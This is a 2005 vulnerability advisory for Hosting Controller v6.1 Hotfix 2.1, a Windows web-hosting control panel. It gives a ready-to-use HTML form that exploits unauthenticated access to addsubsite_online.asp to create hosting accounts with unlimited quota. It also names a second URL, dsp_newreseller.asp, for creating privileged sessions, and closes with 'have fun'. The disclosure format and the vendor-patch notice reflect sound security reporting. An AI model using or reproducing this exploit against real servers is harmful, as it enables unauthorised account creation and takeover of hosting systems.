Bug Hosting Controller New (v6.1 - Hotfix 2.1)
-= KeHieuHoc ? HCE GROUP =-
Information
-------------------------
Software Package : Hosting Controller
Vendor Homepage : http://www.hostingcontroller.com
Platforms : Windows based servers
Vulnerability : Multiple Unauthenticated information disclose
Risk : high
Vulnerable Versions: All version ( Tested on: v.6.1 Hotfix 2.1 )
Vendor Contacted : 09/07/2005
Release Date: : 11/07/2005
Summary
------------
Hosting Controller is a complete array of Web hosting automation tools for
the Windows Server family platform.
(I)
You can create new account on Hosting Controller
Exploit :
http://[target]/admin/hosting/addsubsite_online.asp
Code Form:
<FORM action="http://[target]/admin/hosting/addsubsite_online.asp"
method="post">
<INPUT type="hidden" name="domaintypecheck" value="SECOND" id="Hidden1">
Domain: <INPUT name="DomainName" value="hcegroup.net" id="Hidden2"><BR>
Username: <INPUT name="loginname" value="kehieuhoc" id="Hidden3"><BR>
<INPUT type="hidden" name="Quota" value="-1" id="Hidden4">
<INPUT type="hidden" name="htype" value="27" id="htype5" >
<INPUT type="hidden" name="choice" value="1" id="Hidden6" >
Password: <INPUT name="password" value="kehieuhoc" id="Hidden7"><BR><BR>
<input type="submit" value="Make">
</FORM>
(II)
You can create any ?session? which it is special for owner system
Exploit :
http://[target]/admin/hosting/dsp_newreseller.asp
(I) and (II) -> have fun
Solution
----------
The vender was notified, they have released a patch.
Update Your software
Credits
---------
Discovered on 9 July 2005 by KeHieuHoc ? HCE Group
Email: kehieuhoc@xxxxxxxxx
References
-------------
http://hcegroup.net
------------------------------ // KeHieuHoc ? HCE Group \\
------------------------------